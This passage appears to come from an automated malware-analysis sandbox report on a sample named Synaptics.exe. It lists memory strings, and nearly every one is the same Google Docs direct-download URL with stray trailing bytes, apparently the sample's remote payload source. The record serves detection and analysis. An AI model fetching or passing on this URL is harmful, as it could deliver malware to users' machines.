                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-CH
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-CH-
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcPh
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc_n
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadce
                            Source: Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelleY_
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch-c
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch-u
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadci4T
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.com
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2039578728.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3008225961.000000000E30B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddc
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddl
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadds.cn
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade-ana
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.com
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade:
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadePJ
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadec
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadec-CH
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadect.nX
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadedZ
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeflights-cn.net
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellemE
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademN
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden.
                            Source: Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetlC_
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadent-TU
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeo
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadevali
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadex2#
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3055866183.000000001D7F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfdp
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.00000000070B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg3
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgZ
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle.
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoogB
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgs
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgu
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgv
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgvt2-
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3008225961.000000000E30B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh-~
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhZ
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhZR
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadha
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhu
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhv
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi8
                            Source: Synaptics.exe, 00000005.00000002.2039578728.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiI
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadics.
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiog
                            Source: Synaptics.exe, 00000005.00000002.2039578728.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadion
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadion-
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadion0
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiy
                            Source: Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjCDFJ
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjbd)(
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadje
                            Source: Synaptics.exe, 00000005.00000002.2042366548.00000000049BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2050472489.00000000062AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2059997441.000000000C5FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2042452428.0000000004B1E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2055044010.000000000723E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2059237982.000000000BABE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2058465868.000000000ACFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048015709.000000000515E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2059023678.000000000B6FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2055101302.000000000737E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2055158488.00000000074BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2056284874.00000000089FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2051117791.00000000068AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2057866060.000000000A1BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2056341837.0000000008B3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2057074802.00000000097BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2042105775.000000000459E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2041844952.00000000041BD000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2058877282.000000000B47E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2051379098.0000000006C7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2055669321.0000000007EBE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                            Source: Synaptics.exe, 00000005.00000002.2051040522.000000000676E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2050676772.000000000652E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2050584340.00000000063EE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk##
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkRp#
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3008225961.000000000E30B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniy
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlib
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadll
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllem
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllem#
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadln
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
